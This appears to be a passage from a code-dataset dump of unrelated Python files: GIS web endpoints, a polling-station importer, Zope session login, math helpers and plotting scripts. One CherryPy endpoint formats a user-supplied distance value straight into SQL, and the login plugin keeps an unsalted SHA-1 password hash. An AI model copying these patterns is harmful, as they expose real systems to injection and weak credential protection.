-3:\n\t\t\t\tdelta = d\n\t\t\t\t\n\t\t\tif dy >= 100:\n\t\t\t\tself.MoveBy(d, delta, 100 + delta)\n\t\t\t\tself.Goto(x, y)\n\t\t\telif dy <= -100:\n\t\t\t\tself.MoveBy(d, delta, -100 - delta)\n\t\t\t\tself.Goto(x, y)\n\t\t\telse: \n\t\t\t\tself.MoveBy(d, dx, dy)\n\t\t\t\t\n\t\telse:\n\t\t\t\n\t\t\tif dy >= 100:\n\t\t\t\tself.MoveBy(-3, 50, 100)\n\t\t\t\tself.Goto(x, y)\n\t\t\telif dy <= -100:\n\t\t\t\tself.MoveBy(-3, 50, -100)\n\t\t\t\tself.Goto(x, y)\n\t\t\telse: \n\t\t\t\tself.MoveBy(-3, 50, 0)\n\t\t\t\tself.Goto(x, y)\n\t'''\n\tdef DeleteBlock(self):\n\t\tdelta = self.blockY - self.blockX\n\t\t\n\t\tif delta % 2 == 1:\n\t\t\tdelta -= 1\n\t\t\t\n\t\tself.recipe.append(delta)\n\n\tdef MoveBy(self, d, dx, dy):\n\t\n\t\tdelta = self.blockY - self.blockX\n\t\tisEven = True\n\t\t\n\t\tif (self.blockY + self.blockX) % 2 == 1:\n\t\t\tdelta -= 1\n\t\t\tisEven = False\n\t\t\t\n\t\tif isEven:\n\t\t\trec = self.BlockMoveTableEven[(d, dx, dy)]\n\t\telse:\n\t\t\trec = self.BlockMoveTableOdd[(d, dx, dy + 1)]\n\t\t\n\t\tfor i in rec:\n\t\t\tself.recipe.append(i + delta)\n\t\t\n\t\tself.blockX += dx\n\t\tself.blockY += dy\n\t\tself.sequence.append((d, dx, dy))\n\t\t\n\tdef Init(self, pathEven, pathOdd, pathWss):\n\t\t\n\t\tself.LoadMoveTable(pathEven, True)\n\t\tself.LoadMoveTable(pathOdd, 
False)\n\t\tself.LoadWssTable(pathWss)\n\n\tdef LoadMoveTable(self, path, isEven):\n\t\tins = open(path, \"r\" )\n\t\tarray = []\n\t\t\n\t\tfor line in ins:\n\t\t\tvals = line.split(\":\")\n\t\t\t\n\t\t\tvals[0] = vals[0].replace(\"m\", \"\")\n\t\t\tvals[0] = vals[0].split(\",\")\n\t\t\t\n\t\t\td = int(vals[0][0])\n\t\t\tx = int(vals[0][1])\n\t\t\ty = int(vals[0][2])\n\t\t\t\n\t\t\tself.minD = min(self.minD, d)\n\t\t\tself.maxY = max(self.maxY, abs(y))\n\t\t\tself.maxX = max(self.maxX, x)\n\t\t\t\n\t\t\t\n\t\t\tvals[1] = vals[1].replace(\"E\", \"\").replace(\"\\n\", \"\").replace(\" \", \"\")\n\t\t\tvals[1] = vals[1].split(\",\")\n\t\t\t\n\t\t\tif vals[1][0] != 'X' and vals[1][0] != '':\n\t\t\t\tfor i in xrange(0, len(vals[1])):\n\t\t\t\t\tvals[1][i] = int(vals[1][i])\n\t\t\t\n\t\t\tif isEven:\n\t\t\t\tself.BlockMoveTableEven[(d, x, y)] = vals[1]\n\t\t\telse:\n\t\t\t\tself.BlockMoveTableOdd[(d, x, y)] = vals[1]\n\t\t\t\n\t\tins.close()\n\t\tself.maxY -= 2\n\t\tself.maxX -= 1\n\t\t\n\tdef LoadWssTable(self, path):\n\t\tins = open(path, \"r\" )\n\t\tarray = []\n\t\t\n\t\tfor line in ins:\n\t\t\tvals = line.split(\":\")\n\t\t\t\n\t\t\tvals[0] = vals[0].replace(\"m\", \"\")\n\t\t\tvals[0] = vals[0].split(\",\")\n\t\t\t\n\t\t\tx = int(vals[0][0])\n\t\t\ty = int(vals[0][1])\n\t\t\t\n\t\t\tvals[1] = vals[1].replace(\"E\", \"\").replace(\"\\n\", \"\").replace(\" \", \"\")\n\t\t\tvals[1] = vals[1].split(\",\")\n\t\t\t\n\t\t\tfor i in xrange(0, len(vals[1])):\n\t\t\t\tvals[1][i] = int(vals[1][i])\n\t\t\n\t\t\tself.WssCreator.append([x, y, vals[1]])\t\n\t\t\t\n\t\tins.close()\n\t\t\ndef FindBestDx(recipes):\n\n\tbestX = -1\n\tbestY = -1\n\tbestRation = -10000\n\tfor x in xrange(-24, -4):\n\t\tfor y in xrange(-50, 51):\n\t\t\tval = recipes.BlockMoveTableEven[(-23, x, y)]\n\t\t\tif val[0] == 'X' or val[0] == '':\n\t\t\t\tcontinue\n\t\t\t\n\t\t\tif -x / len(val) > bestRation:\n\t\t\t\tbestRation = -x / len(val)\n\t\t\t\tbestX = x\n\t\t\t\tbestY = y\n\n\tg.show(str((bestX, bestY)))\n\t\n\n\n","sub_path":"Code/RecipeManager.py","file_name":"RecipeManager.py","file_ext":"py","file_size_in_byte":5083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"235817925","text":"from data_collection.management.commands import BaseShpStationsShpDistrictsImporter\n\n\"\"\"\nLichfield publish their data on data.gov.uk as zipped shp files\n\nI've uploaded the data to Amazon S3 for import purposes\n\nAdditionally there's a hashes only scraper at\nhttps://morph.io/wdiv-scrapers/DC-PollingStations-Lichfield\npolling the URLs to look for changes.\n\"\"\"\n\nclass Command(BaseShpStationsShpDistrictsImporter):\n srid = 27700\n council_id = 'E07000194'\n districts_name = 'local.staffordshire.2017-05-04/Lichfield District Council Polling Districts Shapefile/Lichfield_District_Council_Polling_Districts'\n stations_name = 'local.staffordshire.2017-05-04/LDC_Polling_Stations_Shapefile/Lichfield_District_Council_Polling_Station_Locations.shp'\n elections = ['local.staffordshire.2017-05-04']\n\n def district_record_to_dict(self, record):\n return {\n 'internal_council_id': str(record[4]).strip(),\n 'name': str(record[4]).strip(),\n 'polling_station_id': str(record[4]).strip(),\n }\n\n def station_record_to_dict(self, record):\n address = \"\\n\".join([\n str(record[1]).strip(),\n str(record[4]).strip(),\n ])\n postcode = str(record[5]).strip()\n codes = [record[9].strip(), record[10].strip(), record[11].strip()]\n\n stations = []\n for code in codes:\n if code != b'':\n 
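# the record lists up to three district codes; each non-empty code becomes its own station entry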
stations.append({\n 'internal_council_id': str(code),\n 'postcode' : postcode,\n 'address' : address,\n })\n return stations\n","sub_path":"polling_stations/apps/data_collection/management/commands/import_lichfield.py","file_name":"import_lichfield.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"58283283","text":"import os\nimport os.path\nimport psycopg2\nimport json\nimport cherrypy\n\n\nclass DateHelper(object):\n @cherrypy.expose\n def index(self):\n return open('index.html')\n\n\n@cherrypy.expose\nclass Newsagents(object):\n\n def GET(self):\n conn = psycopg2.connect(\"dbname=gisproject user=floofy\")\n cur = conn.cursor()\n cur.execute(\"\"\"\n with MHDtickets as (\n select name, amenity, shop, way from planet_osm_polygon\n where shop = 'newsagent'\n union\n select name, amenity, shop, way from planet_osm_point\n where shop = 'newsagent')\n select ST_AsGeoJSON(st_transform(m.way, 4326))::json from MHDtickets m\n \"\"\")\n listt = []\n while True:\n row = cur.fetchone()\n if row is None:\n break\n else:\n listt.append(row[0])\n print(\"%s\" % row[0])\n reply = json.dumps(listt)\n return reply\n\n\n@cherrypy.expose\nclass Supermarkets(object):\n\n def GET(self):\n conn = psycopg2.connect(\"dbname=gisproject user=floofy\")\n cur = conn.cursor()\n cur.execute(\"\"\"\n with supermarkets as (\n select name, amenity, shop, way from planet_osm_polygon\n where shop = 'supermarket'\n union\n select name, amenity, shop, way from planet_osm_point\n where shop = 'supermarket')\n select ST_AsGeoJSON(st_transform(s.way, 4326))::json from supermarkets s\n \"\"\")\n listt = []\n while True:\n row = cur.fetchone()\n if row is None:\n break\n else:\n listt.append(row[0])\n print(\"%s\" % row[0])\n reply = json.dumps(listt)\n return reply\n\n\n@cherrypy.expose\nclass Flowers(object):\n\n def GET(self):\n conn = psycopg2.connect(\"dbname=gisproject user=floofy\")\n cur = conn.cursor()\n cur.execute(\"\"\"\n with flowers as (\n select name, amenity, shop, way from planet_osm_polygon\n where shop = 'florist'\n union\n select name, amenity, shop, way from planet_osm_point\n where shop = 'florist')\n select ST_AsGeoJSON(st_transform(f.way, 4326))::json from flowers f\n \"\"\")\n listt = []\n while True:\n row = cur.fetchone()\n if row is None:\n break\n else:\n listt.append(row[0])\n print(\"%s\" % row[0])\n reply = json.dumps(listt)\n return reply\n\n\n@cherrypy.expose\nclass Gas(object):\n\n def GET(self):\n conn = psycopg2.connect(\"dbname=gisproject user=floofy\")\n cur = conn.cursor()\n cur.execute(\"\"\"\n with gas as (\n select name, amenity, shop, way from planet_osm_polygon\n where shop = 'fuel'\n union\n select name, amenity, shop, way from planet_osm_point\n where amenity = 'fuel')\n select ST_AsGeoJSON(st_transform(g.way, 4326))::json from gas g\n \"\"\")\n listt = []\n while True:\n row = cur.fetchone()\n if row is None:\n break\n else:\n listt.append(row[0])\n print(\"%s\" % row[0])\n reply = json.dumps(listt)\n return reply\n\n\n@cherrypy.expose\nclass Parks(object):\n\n def GET(self):\n conn = psycopg2.connect(\"dbname=gisproject user=floofy\")\n cur = conn.cursor()\n cur.execute(\"\"\"\n with walkpaths as (\n select name, way, highway from public.planet_osm_line\n where highway = 'path'\n or highway = 'footway'\n ), parks as (\n select name, way, leisure from public.planet_osm_polygon\n where leisure = 'park'\n )\n select ST_AsGeoJSON(ST_Transform(prk.way, 4326))::json from walkpaths p, parks 
prk\n where st_intersects(p.way, prk.way)\n \"\"\")\n listt = []\n while True:\n row = cur.fetchone()\n if row is None:\n break\n else:\n listt.append(row[0])\n print(\"%s\" % row[0])\n reply = json.dumps(listt)\n return reply\n\n\n@cherrypy.expose\nclass Parks_water(object):\n\n def GET(self, distance=None):\n if distance is None:\n distance = 0\n distance = str(distance)\n conn = psycopg2.connect(\"dbname=gisproject user=floofy\")\n cur = conn.cursor()\n cur.execute(\"\"\"\n with rivers as (\n select name, water, waterway, way from public.planet_osm_line\n where water != ''\n or waterway != ''\n union\n select name, water, waterway, way from public.planet_osm_polygon\n where water != ''\n or waterway != ''\n ),\n parks as (\n select name, way, leisure from public.planet_osm_polygon\n where leisure = 'park'\n )\n select ST_AsGeoJSON(ST_Transform(p.way, 4326))::json from rivers r, parks p\n where ST_DWithin(p.way, r.way, '{0}')\n \"\"\".format(distance))\n listt = []\n while True:\n row = cur.fetchone()\n if row is None:\n break\n else:\n listt.append(row[0])\n print(\"%s\" % row[0])\n reply = json.dumps(listt)\n return reply\n\n\ncherrypy.tree.mount(\n Newsagents(), '/api/newsagents',\n {\n '/':\n {'request.dispatch': cherrypy.dispatch.MethodDispatcher()}\n }\n)\n\ncherrypy.tree.mount(\n Supermarkets(), '/api/supermarkets',\n {\n '/':\n {'request.dispatch': cherrypy.dispatch.MethodDispatcher()}\n }\n)\n\ncherrypy.tree.mount(\n Flowers(), '/api/flowers',\n {\n '/':\n {'request.dispatch': cherrypy.dispatch.MethodDispatcher()}\n }\n)\n\ncherrypy.tree.mount(\n Gas(), '/api/gas',\n {\n '/':\n {'request.dispatch': cherrypy.dispatch.MethodDispatcher()}\n }\n)\n\ncherrypy.tree.mount(\n Parks(), '/api/parks',\n {\n '/':\n {'request.dispatch': cherrypy.dispatch.MethodDispatcher()}\n }\n)\n\ncherrypy.tree.mount(\n Parks_water(), '/api/parks_water',\n {\n '/':\n {'request.dispatch': cherrypy.dispatch.MethodDispatcher()}\n }\n)\n\nif __name__ == '__main__':\n conf = {\n '/': {\n 'tools.sessions.on': True,\n 'tools.staticdir.root': os.path.abspath(os.getcwd())\n },\n '/static': {\n 'tools.staticdir.on': True,\n 'tools.staticdir.dir': './public'\n }\n }\n\n webapp = DateHelper()\n\n cherrypy.quickstart(webapp, '/', conf)\n","sub_path":"cherry.py","file_name":"cherry.py","file_ext":"py","file_size_in_byte":6832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"534656097","text":"\n# Devuelve true si n es primo (sin conocimiento previo)\ndef is_prime_number(n):\n if n < 2:\n return False\n end = int(n**0.5)\n for i in range(2, end+1):\n if n%i == 0:\n return False\n return True\n\n# Devuelve true si n es primo\n# Se apoya en prime_list, que contiene los primos descubiertos\n# hasta el momento\ndef is_prime_from_list(n, prime_list):\n if len(prime_list) == 0:\n return True\n for p in prime_list:\n if n%p == 0:\n return False\n return True\nprime_list = []\n\n\n# Genera todas las permutaciones posibles entre los digitos de r\ndef get_permutations(r):\n if len(r) == 1:\n return [r]\n output = []\n for i in range(0,len(r)):\n resto = r[0:i] + r[i+1:len(r)]\n comb = get_permutations(resto)\n for p in comb:\n l = [r[i]] + p\n # No añade duplicados\n if l not in output:\n output.append(l)\n return output\n\n# Convierte las permutaciones a enteros\ndef array_to_str(array: list) -> int:\n array_n = [str(n) for n in array]\n return int(''.join(array_n))\n\n# Devuelve true si el elemento x está en arr\n# busqueda binaria\ndef is_present(arr, x): \n low = 0\n high 
= len(arr) - 1\n mid = 0\n if x < arr[0] or x > arr[len(arr)-1]:\n return False\n while low <= high: \n mid = (high + low) // 2\n if x == arr[mid]:\n return True\n if arr[mid] < x: \n low = mid + 1\n elif arr[mid] > x: \n high = mid - 1\n return False\n\n# Devuelve una lista de factores unicos de number\ndef get_factores(number):\n factores = []\n resto = number\n for i in range(2, int(number**0.5)+1):\n if resto % i == 0:\n factores.append(i)\n while resto % i == 0:\n resto = resto / i\n if resto == 1:\n return factores\n factores.append(int(resto))\n return factores","sub_path":"auxiliary.py","file_name":"auxiliary.py","file_ext":"py","file_size_in_byte":1932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"311906675","text":"import csv\nfrom code.classes.battery import Battery\nfrom code.classes.house import House\nfrom code.classes.district import District\nimport matplotlib.pyplot as plt\n\n\n\n\nlist_house_objects = []\nlist_battery_objects = []\n\nwith open('data/Huizen&Batterijen/district_1/district-1_batteries.csv') as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n line_count = 0\n id_loop = 1\n for row in csv_reader:\n if line_count == 0:\n print(f'Column names are {\", \".join(row)}')\n line_count += 1\n else:\n print(f'Coordinates are: {row[0]}, Capacity is: {row[1]}.')\n\n coordinates = row[0]\n capacity = row[1]\n list_coordinates = coordinates.split(\",\")\n x_coordinate = int(list_coordinates[0])\n y_coorinate = int(list_coordinates[1])\n\n\n b = Battery(id_loop, x_coordinate, y_coorinate, capacity)\n list_battery_objects.append(b)\n\n line_count += 1\n id_loop += 1\n\n print(f'Processed {line_count} lines.')\n\nwith open('data/Huizen&Batterijen/district_1/district-1_houses.csv') as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n line_count = 0\n for row in csv_reader:\n if line_count == 0:\n #print(f'Column names are {\", \".join(row)}')\n line_count += 1\n else:\n print(f'Coordinates are: {row[0]}, {row[1]}. Output is: {row[2]}.')\n\n x_coordinate = int(row[0])\n y_coorinate = int(row[1])\n output = float(row[2])\n print(output)\n\n h = House(x_coordinate, y_coorinate, output)\n list_house_objects.append(h)\n line_count += 1\n\nd = District(list_house_objects,list_battery_objects)\n\n\n#Plotting the batteries and houses\n\n#Creating an empty plot\nx = range(60)\ny = range(60)\nplt.plot(x,y)\nplt.show()\nfig = plt.figure()\nax1 = fig.add_subplot(111)\n\n#Adding batteries\nbatteries = d.batteries\nfor battery in batteries:\n # plot each battery at its stored coordinates\n ax1.scatter(battery.x_coordinate, battery.y_coordinate, c=\"r\", label='batteries')\n\n#Adding houses\nhouses = d.houses\nfor house in houses:\n # plot each house at its stored coordinates\n ax1.scatter(house.x_coordinate, house.y_coordinate, c=\"b\", label='houses')\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"330899879","text":"##############################################################################\n#\n# Copyright (c) 2005 Zope Corporation. All Rights Reserved.\n#\n# This software is subject to the provisions of the Zope Visible Source\n# License, Version 1.0 (ZVSL). 
A copy of the ZVSL should accompany this\n# distribution.\n#\n# THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED\n# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS\n# FOR A PARTICULAR PURPOSE\n#\n##############################################################################\n\nimport sha\n\nimport zope.publisher.interfaces.http\n\nimport zope.app.authentication.session\nimport zope.session.interfaces\nimport zope.app.http.httpdate\n\nclass CredentialsDontMakeSecurityDeclarationsForMe:\n # Credentials class. We use this rather than a dict to prevent\n # leakage to untrusted code. As long as no one is fool enough to\n # make security declarations for this then untrusted code will get\n # forbidden errors trying to access data.\n\n domain = None\n \n def __init__(self, **kw):\n self.__dict__.update(kw)\n\n\nclass SessionCredentialsPlugin(\n zope.app.authentication.session.SessionCredentialsPlugin,\n ):\n\n _fields = ('login', 'login.login'), ('password', 'login.password')\n\n def extractCredentials(self, request):\n \"\"\"Extracts credentials from a session if they exist.\"\"\"\n\n if not zope.publisher.interfaces.http.IHTTPRequest.providedBy(request):\n return None\n\n data = dict((k, request[rk]) for (k, rk) in self._fields\n if rk in request)\n credentials = None\n\n session = zope.session.interfaces.ISession(request)\n\n if len(data) == len(self._fields):\n data['sha'] = sha.new(data.pop('password').encode('utf-8')\n ).hexdigest()\n self.save_credentials(data, session)\n data['logging_in'] = True\n return self._update_cookie(request, data)\n\n sessionData = session.get('zope.app.authentication.browserplugins')\n if sessionData:\n return self._update_cookie(request,\n sessionData.get('credentials').__dict__)\n\n return None\n\n def _update_cookie(self, request, credentials):\n if credentials:\n domain = credentials.get('domain') \n if domain and (request.cookies.get('login.domain') != domain):\n request.response.setCookie(\n 'login.domain', domain,\n expires = 'Wed, 01-Jan-3000 00:00:00 GMT',\n )\n credentials['request-annotations'] = request.annotations\n return credentials\n \n def save_credentials(self, credentials, session=None, request=None):\n if session is None:\n session = zope.session.interfaces.ISession(request)\n sessionData = session['zope.app.authentication.browserplugins']\n sessionData['credentials'] = (\n CredentialsDontMakeSecurityDeclarationsForMe(**credentials)\n )\n\n def logout(self, request):\n self.save_credentials({}, request=request)\n \n def challenge(self, request):\n if 'login.ignore' in request:\n return False\n return super(SessionCredentialsPlugin, self).challenge(request)\n\nclass DomainSessionCredentialsPlugin(SessionCredentialsPlugin):\n\n _fields = SessionCredentialsPlugin._fields + (('domain', 'login.domain'),)\n","sub_path":"Sandbox/J1m/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":3557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"613169543","text":"import unittest\nfrom abc import ABC\n\nimport numpy as np\n\nfrom pygibbs.gibbs import hlm\n\n\nclass ConsistencyTest(ABC):\n\n def setUp(self, mod, nres=int(1e3), nobs=int(1e3), nvar=2, tol=(1e-1, 1e-1)):\n\n self.mod = mod\n self.tol = tol\n self.data, self.gt, self.hyper = self.mod._generate_fixture(nres, nobs, nvar)\n\n def test_map(self, niter=int(1e2)):\n\n map = self.mod.estimate(niter, *self.data, 
*self.hyper)\n for est, true in zip(map[1], self.gt[1]):\n np.testing.assert_allclose(est, true, *self.tol)\n\n def test_pev(self, niter=int(1e2)):\n\n samples = self.mod.sample(niter, *self.data, *self.hyper)\n for est, true in zip([np.mean(x, 0) for x in samples[1]], self.gt[1]):\n np.testing.assert_allclose(est, true, *self.tol)\n\n def test_map_eta(self):\n\n map = self.mod.estimate_eta(self.data, self.gt[1])\n for est, true in zip(map, self.gt[0]):\n np.testing.assert_allclose(est, true, *self.tol)\n\n def test_map_theta(self):\n\n map = self.mod.estimate_theta(self.data, self.gt[0], self.hyper)\n for est, true in zip(map, self.gt[1]):\n np.testing.assert_allclose(est, true, *self.tol)\n\n def test_logmargin(self):\n\n map = self.mod.estimate_theta(self.data, self.gt[0], self.hyper)\n np.testing.assert_allclose(self.mod.eval_logobserved(self.data, map),\n self.mod.eval_loglik(self.data, self.gt[0], map).sum(),\n *self.tol)\n\n\nclass ConsistencyTest_hlm(ConsistencyTest, unittest.TestCase):\n def setUp(self):\n super(ConsistencyTest_hlm, self).setUp(hlm)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/gibbs_tests.py","file_name":"gibbs_tests.py","file_ext":"py","file_size_in_byte":1715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"273322917","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nModule that contains implementation for preferences manager\n\"\"\"\n\nfrom __future__ import print_function, division, absolute_import\n\nimport os\n\nimport metayaml\n\nimport tpDcc as tp\nfrom tpDcc import register\nfrom tpDcc.core import config\nfrom tpDcc.libs.python import decorators, folder\n\n\nclass ConfigsManager(object):\n\n EXTENSION = 'yml'\n\n def __init__(self):\n self._package_configs = dict()\n\n # ============================================================================================================\n # BASE\n # ============================================================================================================\n\n def register_package_path(self, package_name, module_name, config_path, environment='development'):\n \"\"\"\n Registers configurations path for given package\n :param package_name: str, name of the package configuration files belong to\n :param module_name: str, name of the module this configuration belongs to\n :param config_path: str, path where configuration file is located\n \"\"\"\n\n if not config_path or not os.path.isdir(config_path):\n tp.logger.warning(\n 'Configuration Path \"{}\" for package \"{}\" does not exists!'.format(config_path, package_name))\n return\n\n if environment:\n config_path = os.path.join(config_path, environment.lower())\n if not os.path.isdir(config_path):\n tp.logger.warning(\n 'Configuration Folder for environment \"{}\" and package \"{}\" does not exists \"{}\"'.format(\n environment, package_name, config_path))\n return\n\n dcc_name = tp.Dcc.get_name()\n dcc_version = tp.Dcc.get_version_name()\n\n base_config = os.path.join(config_path, module_name)\n dcc_config_path = os.path.join(config_path, dcc_name, module_name)\n dcc_version_config_path = os.path.join(config_path, dcc_name, dcc_version, module_name)\n\n if package_name not in self._package_configs:\n self._package_configs[package_name] = dict()\n if module_name not in self._package_configs[package_name]:\n self._package_configs[package_name][module_name] = dict()\n\n config_extension = self.EXTENSION\n if not config_extension.startswith('.'):\n config_extension = 
'.{}'.format(config_extension)\n\n self._package_configs[package_name][module_name][environment] = {\n 'base': '{}{}'.format(base_config, config_extension),\n 'dcc': '{}{}'.format(dcc_config_path, config_extension),\n 'dcc_version': '{}{}'.format(dcc_version_config_path, config_extension)\n }\n\n def register_package_configs(self, package_name, config_path):\n \"\"\"\n Tries to find and registers all configuration paths of given path and in the given path\n :param package_name: str\n :param config_path: str\n \"\"\"\n\n config_extension = self.EXTENSION\n if not config_extension.startswith('.'):\n config_extension = '.{}'.format(config_extension)\n\n if not config_path or not os.path.isdir(config_path):\n return\n\n for environment in ['development', 'production']:\n config_files = folder.get_files(\n config_path, full_path=False, recursive=True, pattern='*{}'.format(config_extension))\n if not config_files:\n continue\n module_names = [os.path.splitext(file_path)[0] for file_path in config_files]\n for module_name in module_names:\n self.register_package_path(\n package_name=package_name, config_path=config_path,\n module_name=module_name, environment=environment)\n\n def get_config(self, config_name, package_name=None, root_package_name=None,\n environment=None, config_dict=None, parser_class=None, extra_data=None):\n \"\"\"\n Returns configuration\n :param package_name:\n :param root_package_name:\n :param config_name:\n :param environment:\n :param config_dict:\n :return:\n \"\"\"\n\n if config_dict is None:\n config_dict = dict()\n if extra_data is None:\n extra_data = dict()\n\n if not parser_class:\n parser_class = config.YAMLConfigurationParser\n\n if not package_name:\n package_name = config_name.replace('.', '-').split('-')[0]\n\n config_data = self._get_config_data(\n package_name=package_name, config_name=config_name,\n config_dict=config_dict, root_package_name=root_package_name, environment=environment)\n if config_data is None:\n config_data = dict()\n\n parsed_data = parser_class(config_data).parse()\n extra_data.update(parsed_data)\n new_config = config.DccConfig(config_name=config_name, environment=environment, data=extra_data)\n\n return new_config\n\n def _get_all_package_configs(self, package_name, root_package_name=None, environment=None, skip_non_existent=True):\n \"\"\"\n Internal function that returns a list with all configuration files of given package\n :param package_name: str\n :param root_package_name: str\n :param environment: str\n :param skip_non_existent: bool\n :return: list(dict)\n \"\"\"\n\n module_paths = dict()\n\n if root_package_name and root_package_name not in self._package_configs:\n tp.logger.warning(\n 'Impossible to retrieve package configs because root package: \"{}\" does not exist!'.format(\n root_package_name))\n return module_paths\n\n if package_name not in self._package_configs:\n tp.logger.warning(\n 'Impossible to retrieve package configs because package: \"{}\" does not exist!'.format(\n root_package_name))\n return module_paths\n\n packages_to_loop = list()\n if root_package_name:\n packages_to_loop = [root_package_name]\n packages_to_loop.append(package_name)\n\n for package_name in packages_to_loop:\n for module_name, env_dicts in self._package_configs[package_name].items():\n for env_name, module_dict in env_dicts.items():\n base_path = module_dict.get('base', None)\n dcc_path = module_dict.get('dcc', None)\n dcc_version_path = module_dict.get('dcc_version', None)\n found_paths = list()\n\n if environment and environment.lower() 
!= env_name.lower():\n continue\n\n if skip_non_existent:\n if base_path and os.path.isfile(base_path):\n found_paths.append(base_path)\n if dcc_path and os.path.isfile(dcc_path):\n found_paths.append(dcc_path)\n if dcc_version_path and os.path.isfile(dcc_version_path):\n found_paths.append(dcc_version_path)\n else:\n if base_path:\n found_paths.append(base_path)\n if dcc_path:\n found_paths.append(dcc_path)\n if dcc_version_path:\n found_paths.append(dcc_version_path)\n if not found_paths:\n continue\n if module_name not in module_paths:\n module_paths[module_name] = list()\n\n module_paths[module_name].extend(found_paths)\n\n return module_paths\n\n def _get_config_data(self, package_name, config_name, config_dict, root_package_name=None, environment=None):\n \"\"\"\n Intgernal function that returns data of the given configuration\n :param package_name: str\n :param config_name: str\n :param config_dict: dict\n :param root_package_name: str\n :param environment: str\n :return:\n \"\"\"\n\n if not package_name:\n tp.logger.error('Impossible to find configuration if package is not given!')\n return None\n if not config_name:\n tp.logger.error('Impossible to to find configuration if configuration name is not given!')\n return None\n\n if package_name not in self._package_configs:\n tp.logger.error('No configurations find for package \"{}\"'.format(package_name))\n return None\n\n config_extension = self.EXTENSION\n if not config_extension.startswith('.'):\n config_extension = '.{}'.format(config_extension)\n\n valid_package_configs = self._get_all_package_configs(\n package_name=package_name, root_package_name=root_package_name, environment=environment)\n if not valid_package_configs or config_name not in valid_package_configs:\n # tp.logger.info(\n # 'Impossible to load configuration \"{}\" for package \"{}\" because it does not exists in '\n # 'configuration folders!'.format(config_name, package_name))\n return\n\n module_configs = valid_package_configs[config_name]\n\n # We read the last configuration found: dcc_version > dcc > base\n config_path = module_configs[-1]\n config_data = metayaml.read(module_configs, config_dict)\n if not config_data:\n raise RuntimeError('Configuration file \"{}\" is empty!'.format(config_path))\n\n # We store path where configuration file is located in disk\n if 'config' in config_data and 'path' in config_data['config']:\n raise RuntimeError('Configuration file cannot contains section with path attribute! 
{}'.format(\n self, config_path))\n if 'config' in config_data:\n config_data['config']['path'] = config_path\n else:\n config_data['config'] = {'path': config_path}\n\n return config_data\n\n\n@decorators.Singleton\nclass ConfigsManagerSingleton(ConfigsManager, object):\n \"\"\"\n Singleton class that holds preferences manager instance\n \"\"\"\n\n def __init__(self):\n ConfigsManager.__init__(self)\n\n\nregister.register_class('ConfigsMgr', ConfigsManagerSingleton)\n","sub_path":"tpDcc/managers/configs.py","file_name":"configs.py","file_ext":"py","file_size_in_byte":10406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"465793976","text":"mol_change={'ERK':'ERK', 'MEK':'MEK','MKP1':'MKP1','PP2A':'PP2A','Raf':'Raf1','bRaf':'bRaf','dRaf1Ras':'dRaf1Ras','cAMP':'cAMP','PDE2':'PDE2','PDE4':'PDE4','PKA':'PKA','PKAc':'PKAc','Src':'Src','Cbl':'Cbl','CRKC3G':'CRKC3G','CamCa4':'CamCa4','CKpCamCa4':'CKpCamCa4','CKpCamCa4SynGap':'CKpCamCa4SynGap','PP1':'PP1','IP35':'Ip35','NgCam':'NgCam','Grb2':'Grb2','Sos':'Sos','Shc':'Shc','RasGRF':'RasGRF','Epac':'Epac','RasGDP':'RasGDP','Rap1GDP':'Rap1GDP','Ca':'Ca','Leak':'Leak','pmca':'pmca','ncx':'ncx','Calbin':'Calbin','CB':'CB','rasGap':'rasGap','rapGap':'rap1Gap','SynGap':'SynGap'}\n\nimport glob\nimport os\nfrom lxml import etree\nfrom xml.etree import ElementTree as ET\nimport numpy as np\n\ncrtl_list={}\nfilename='IC_ERK-Test_basald.xml'\nroot=ET.parse(filename).getroot()\nfor mol in mol_change.keys():\n for elem in root:\n for subelem in elem:\n if mol==subelem.attrib['specieID']:\n val=float(subelem.attrib['value'])\n crtl_list[mol]=val\n\nPATH='./'\npattern_IC=PATH+'IC'+'*'+'random*'+'*.xml'\nIC_filename=sorted(glob.glob(pattern_IC)) \nall_list={}\n#\nfor file_name in IC_filename:\n root=ET.parse(file_name).getroot()\n f=file_name.split('-')[-1].split('.')[0]\n all_list[f]={}\n for mol in crtl_list.keys():\n for elem in root:\n for subelem in elem:\n if mol== subelem.attrib['specieID']:\n change_val=float(subelem.attrib['value'])/crtl_list[mol]\n all_list[f][mol]=change_val\noutfname='RandomAnalysis_mol.npy'\nnp.save(outfname,all_list)\n\n'''\n#to check data\ndat=np.load(outfname+'.npz',allow_pickle=True)\ndat.keys()\ndat['ctrl'].item() \n'''\n\nimport pandas as pd\nfrom matplotlib import pyplot as plt\nplt.ion()\nimport math\n\ndf=pd.DataFrame.from_dict(all_list,orient='index')\ndf.to_csv('mol_list.txt')\n\n\nncols=6\nnrows=math.ceil(len(df.columns)/ncols)\n\nfig,axes=plt.subplots(nrows,ncols)\nfor i, col in enumerate(df.columns):\n for r in range(nrows):\n for c in range(ncols):\n df[col].plot.bar(ax=axes[r,c],title=col)\n 